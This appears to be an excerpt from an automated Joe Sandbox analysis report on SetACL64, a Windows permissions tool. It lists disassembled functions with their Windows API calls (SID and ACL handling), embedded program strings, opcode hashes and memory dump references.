Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
Instruction ID: 1bac08d3dfce127cab66ed442dab11835e7cc2ac3090a74a3084147d2f74ad41
Opcode Fuzzy Hash: a89e39b1e6dab9013fa2c69796a28cd76b0915c44a41f147d36bdeccd3bdc5f6
Instruction Fuzzy Hash: 0E2116A0F0AB0381FE75DB24ED5417963B1EF58BE5F9854B5C90EC67A0EE2CA495C220

Function 00007FF6970523BF Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 316COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705285E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052864
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705286A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052876
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705287C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052882
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052888
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705288E

Strings

AddDomain, xrefs: 00007FF6970524A6
> is probably incorrect., xrefs: 00007FF697052459
Domain name <, xrefs: 00007FF697052442

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: > is probably incorrect.$AddDomain$Domain name <
API String ID: 3668304517-3402377043
Opcode ID: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
Instruction ID: cfb4aaacbfa1f56eb1afd97ae68985b946e50c43a2f0a8d7810b44ec06fbec78
Opcode Fuzzy Hash: 331517c9e7e271e5a7fd40b88897b6cbc41d5860be722eeb7a384d55d81c47f0
Instruction Fuzzy Hash: 2CD15DE2B1574285EE24DB69E4993AD2322FB447E4F805671DA6CC7AE9DF7CE180C300

Function 00007FF697061760 Relevance: 18.5, APIs: 12, Instructions: 476COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32 ref: 00007FF69706193F
LocalFree.KERNEL32 ref: 00007FF69706197A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF697061B0D
LocalFree.KERNEL32 ref: 00007FF697061B4A
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF697061C8C
LocalFree.KERNEL32 ref: 00007FF697061CC9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061DB9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061DBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061DCB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061DD7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061DDD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697061DE3

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ConvertFreeLocalString
String ID:
API String ID: 347880976-0
Opcode ID: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
Instruction ID: ba04b95e8da466ac90575850960200bbc92127fd4054168413d05cb82125b25a
Opcode Fuzzy Hash: 7f36a04dbe1e1195e17bb9c4e0bc062f01be79f362d0442487ffcee1471e9626
Instruction Fuzzy Hash: BB225EA2A08B8185EB108B68E4543AD77B1FB457E8F105365EF9C93AE9DF78E1D4C700

Function 00007FF69706A090 Relevance: 18.1, APIs: 12, Instructions: 145COMMON

Download Yara Rule

APIs

IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,00000000,00000000,00007FF697069A60), ref: 00007FF69706A0E7

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Valid
String ID:
API String ID: 1304828667-0
Opcode ID: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
Instruction ID: adfba304615729033c36c533d279a71f2f1ee043844aead10a459f7879cb0513
Opcode Fuzzy Hash: 562027f6ea632b8d146ccf656e1ba2dcc13df42484284c78869221e205c5226f
Instruction Fuzzy Hash: CA517EE6A18A4282EB60AB26E82563A77A1FBD4FD4F048171DE4EC7754EF3CE5458700

Function 00007FF6970521F7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705286A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052876
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705287C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052882
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697052888
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705288E

Strings

AddDomain, xrefs: 00007FF69705223F
No domain specified., xrefs: 00007FF697052213

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: AddDomain$No domain specified.
API String ID: 3668304517-2536513783
Opcode ID: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
Instruction ID: 15ee6df106d58605f9ffdc5119f840e4e5b5481545b0a81cafab0685ce2640e1
Opcode Fuzzy Hash: 99e0925a6b9fdd9a5b0408bba0820a297a0d0a02d1bb6155b4d59c8334b4e1bd
Instruction Fuzzy Hash: 505163F2B1964291EA249B69E8993AD6322FF407D4F805571D74CC7AE9DF7CE181C304

Function 00007FF6970449B0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 209COMMON

Download Yara Rule

APIs

VerQueryValueW.VERSION ref: 00007FF697044A5F
GetUserDefaultLangID.KERNEL32 ref: 00007FF697044B89
VerQueryValueW.VERSION ref: 00007FF697044C7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044D12
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044D18
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697044D1E

Strings

\VarFileInfo\Translation, xrefs: 00007FF697044A30
\StringFileInfo\%04x%04x\%s, xrefs: 00007FF697044A78
\StringFileInfo\%04X04B0\%s, xrefs: 00007FF697044B76

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$QueryValue$DefaultLangUser
String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
API String ID: 124864902-1470331934
Opcode ID: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
Instruction ID: 8ae59c3815ffa61f3c5a6dae90f19232948987a36f81f5efd7e8266b4ffd7bf0
Opcode Fuzzy Hash: 84a91a20877e75cd1db0540d89d5f8e58374f05ff5f461cff2050a2cec5ccb81
Instruction Fuzzy Hash: E49190B2A18B4180EB20CF58E4442AE7761FB957E4F505275EA9DC3AA9EF7CE184C700

Function 00007FF69704A7F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704A859
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF69704A8A4
_Getctype.LIBCPMT ref: 00007FF69704A8BC
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704A94C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704A996
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF69704A9BB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704A9E5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF69704AA6E

Strings

bad locale name, xrefs: 00007FF69704A96F

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$GetctypeLocinfo::_Locinfo_ctor
String ID: bad locale name
API String ID: 249287498-1405518554
Opcode ID: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
Instruction ID: e4ae98d1b8f9eeea78825533a8ebc3af349dff339e025128eda4652d0f92f745
Opcode Fuzzy Hash: 8bc982661b0ee05dfb2898125f394b4b40cc44dd271d2c8eedadb7c000856f72
Instruction Fuzzy Hash: 55717FA2B09A4185FB25DB64D8912BC2364FFA47C4F0840B5DE4DE3A95EF38E9629304

Function 00007FF697066970 Relevance: 15.3, APIs: 10, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
Instruction ID: 0ead903d55627d1a8f9d34a6fc7967429d4e99c29ea6314a772edc9e1a943e1f
Opcode Fuzzy Hash: 7a5f5edd017b658e983cfd53b7e8145c4734415c703908048787467d75527855
Instruction Fuzzy Hash: 96B19AB2A15B8189EB24CF64E8947AC33B5FB48B8CF505565EF8C87A98DF38D590C344

Function 00007FF697069830 Relevance: 15.2, APIs: 10, Instructions: 188COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32 ref: 00007FF69706989B
GetLastError.KERNEL32 ref: 00007FF6970698A5
GetAce.ADVAPI32 ref: 00007FF6970698FA
EqualSid.ADVAPI32 ref: 00007FF697069949
DeleteAce.ADVAPI32 ref: 00007FF697069974
IsValidSid.ADVAPI32 ref: 00007FF69706999F
GetLastError.KERNEL32 ref: 00007FF6970699DA
IsValidSid.ADVAPI32 ref: 00007FF697069A31
GetLastError.KERNEL32 ref: 00007FF697069ADF
GetLastError.KERNEL32 ref: 00007FF697069AF2

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$Valid$DeleteEqualInformation
String ID:
API String ID: 439278688-0
Opcode ID: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
Instruction ID: f2919b4933fc52e985f3eb38d1bddd583487f3dc07c6d356ec1e0781433c8b1e
Opcode Fuzzy Hash: 02abaca1715827c988373279d1206fa39163a6e830349d42f3409750fdde2c61
Instruction Fuzzy Hash: FC815FB1A2868686EB708B25956437D77E0FF84BD4F044679CA8DC7B84EF3CE5909740

Function 00007FF697069B10 Relevance: 15.2, APIs: 10, Instructions: 168COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF697069B9F

Part of subcall function 00007FF69706EC20: IsValidSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF697070410), ref: 00007FF69706EC37
Part of subcall function 00007FF69706EC20: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF697070410), ref: 00007FF69706EC44
Part of subcall function 00007FF69706EC20: CopySid.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF697070410), ref: 00007FF69706EC68

IsValidSid.ADVAPI32 ref: 00007FF697069BC2
IsValidSid.ADVAPI32 ref: 00007FF697069BD4
EqualSid.ADVAPI32 ref: 00007FF697069BE5
IsValidSid.ADVAPI32 ref: 00007FF697069C1A
IsValidSid.ADVAPI32 ref: 00007FF697069C5A
IsValidSid.ADVAPI32 ref: 00007FF697069C7D
IsValidSid.ADVAPI32 ref: 00007FF697069C8F
EqualSid.ADVAPI32 ref: 00007FF697069CA0
IsValidSid.ADVAPI32 ref: 00007FF697069CD5

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Valid$Equal$CopyLength
String ID:
API String ID: 1685539899-0
Opcode ID: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
Instruction ID: d699359894a3c81608b9cdb4ff989d760222801c38a581b50d0dd6825efb63ce
Opcode Fuzzy Hash: 3b1f6e0476a15e4dbeff593321d0a39690655f45c3396d74e8fe94f401111051
Instruction Fuzzy Hash: EE616FA2B19A4645EB749B22996473D73E1FF84FE4F0942B9DD0DC7A84EE2CE581C700

Function 00007FF6970450C0 Relevance: 14.5, APIs: 6, Strings: 2, Instructions: 468COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704570C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697045712
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697045718
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69704571E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697045724
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697045787

Part of subcall function 00007FF697070C18: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697070C35
Part of subcall function 00007FF697070C18: std::locale::_Setgloballocale.LIBCPMT ref: 00007FF697070C58
Part of subcall function 00007FF697070C18: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF697070CF3

Strings

\\?\UNC\, xrefs: 00007FF6970452A0
\\?\, xrefs: 00007FF69704538D

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Lockitstd::_$Lockit::_Lockit::~_Setgloballocalestd::locale::_
String ID: \\?\$\\?\UNC\
API String ID: 3857612545-3019864461
Opcode ID: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
Instruction ID: 9e162e433688ea9079be8ed6d63d10dcb0cae90283fcd4b52bff13c0dace42b8
Opcode Fuzzy Hash: 80f86e82870b07e6d5627ecd3545ff3dece0f910a388d86736f9a77694643264
Instruction Fuzzy Hash: 7212ACA2F14A5280EF249B68E8443AD2372FB65BD8F504175DE1DD77E8EF78E4849340

Function 00007FF697050CC0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 350COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970510F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970510FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697051104
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705110A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697051110
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970511F4

Strings

No trustee specified., xrefs: 00007FF697050D24
AddTrustee, xrefs: 00007FF697050D52

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: AddTrustee$No trustee specified.
API String ID: 3668304517-2850116058
Opcode ID: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
Instruction ID: a9395adcb96aa2e06cc0b525b848ce60a11681686e8485639cffa7614b071b2d
Opcode Fuzzy Hash: fb94bdf829771a45d73d4169ee65a2f39625c9cf73fdf6b67dd04f57a629b6a1
Instruction Fuzzy Hash: B5E18FB2B1968291EF249B29E8843AD6372FB857D8F505175DB4CC7AA9DF7CE490C300

Function 00007FF697048C30 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF697048F2C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF697048F32
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF697048F38
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF697048FAE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF697048FF6

Strings

true, xrefs: 00007FF697048DCA
false, xrefs: 00007FF697048D0E

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: false$true
API String ID: 164343898-2658103896
Opcode ID: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
Instruction ID: 48377019935306821c3fbb23893d731f38c7d77ad84278068cebc409ba1df2b7
Opcode Fuzzy Hash: f445c541dcabc8c76a2eb441bad9b69acf557a9bd182a87f89098410cebb741f
Instruction Fuzzy Hash: D7D17862B1AB428AEB20DF61D8412AD33A5FF58788F0545B5DE4CE7B89EF38D516C304

Function 00007FF697070320 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 252COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6970708C0: IsValidSid.ADVAPI32(?,?,?,00007FF69707034D,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970708E2
Part of subcall function 00007FF6970708C0: GetLengthSid.ADVAPI32(?,?,?,00007FF69707034D,?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970708F3

IsValidSid.ADVAPI32(?,?,?,?,?,00007FF69706F8CF), ref: 00007FF697070379
IsValidSid.ADVAPI32 ref: 00007FF69707038C
EqualSid.ADVAPI32 ref: 00007FF69707039D
IsValidSid.ADVAPI32(?,?,?,?,?,00007FF69706F8CF), ref: 00007FF6970703FE
IsValidSid.ADVAPI32(?,?,?,?,?,00007FF69706F8CF), ref: 00007FF697070549
IsValidSid.ADVAPI32 ref: 00007FF69707055C
EqualSid.ADVAPI32 ref: 00007FF69707056E

Strings

unordered_map/set too long, xrefs: 00007FF697070628

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Valid$Equal$Length
String ID: unordered_map/set too long
API String ID: 2183326427-306623848
Opcode ID: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
Instruction ID: a30a2e7d39a3cb64f3494c9496d4d86a9eaa81a8a0e1f28f1ec9a1d3ae7cebe5
Opcode Fuzzy Hash: ad27f92fef91cd753ab91c311a8dad5f0718926ff1c6d6db717cf738553d2b84
Instruction Fuzzy Hash: 98A17FA2B19B4585EE608F12E84437A63A4FF98BC4F588675DA8DC7754DF3CE4B08300

Function 00007FF697097748 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 186COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF6970977A6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970978BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69709790A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970979EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697097A3B

Strings

SetACL finished with error(s): , xrefs: 00007FF697097771
SetACL error message: , xrefs: 00007FF6970977FE
Operating system error message: , xrefs: 00007FF697097933

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$LoadString
String ID: Operating system error message: $SetACL error message: $SetACL finished with error(s):
API String ID: 498717675-3876775778
Opcode ID: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
Instruction ID: 952d6c32c8d22b03276485125c49ca445147562667a30cc8ee631b97011a35e2
Opcode Fuzzy Hash: 5ce873107c147e58fbec8a04b54c5fd4bfe3e96f955e4566f1b3ca94a313b483
